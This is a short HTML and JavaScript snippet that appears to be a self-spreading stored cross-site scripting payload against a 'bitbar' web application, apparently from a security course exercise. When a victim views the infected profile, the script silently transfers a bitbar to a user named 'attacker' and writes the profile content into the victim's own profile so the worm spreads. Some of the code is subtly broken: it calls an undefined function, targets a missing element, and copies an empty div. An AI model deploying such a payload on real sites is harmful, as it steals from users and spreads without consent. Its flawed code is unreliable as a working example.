<div id="profile"></div>
<span id="bitbar_count" class="10"></span>
<script id="profileScript" type="text/javascript">
  var total = 10; 
  function show(bitbars) {
    document.getElementById("bitbar_display").innerHTML = "10 bitbars";
    if (bitbars < total) {
      setTimeout("showBitbars(" + (bitbars + 1) + ")", 20);
    } else {
      document.getElementById("profile").style.display = "none";
      
    }
  }
  function transfer() {
    fetch("/post_transfer", {
      method: "POST",
      body: JSON.stringify({ destination_username: "attacker", quantity: 1 }),
      headers: {
        "Content-Type": "application/json"
      }
    })
      .then(response => {
        console.log("Transferred 1 bit to attacker.");
      })
      .catch(error => {
        console.error("Failed to transfer bit to attacker.");
      });
  }
  async function copy() {
    const profileContent = document.getElementById("profile").innerHTML;

    fetch("/set_profile", {
      method: "POST",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify({ new_profile: profileContent })
    })
    .then(response => response
    )
    .catch(error => {
      console.error("Error occurred while setting profile:", error);
    });
} 
  if (total > 0) {
    show(0);
    transfer();
    copy();
  }
</script>
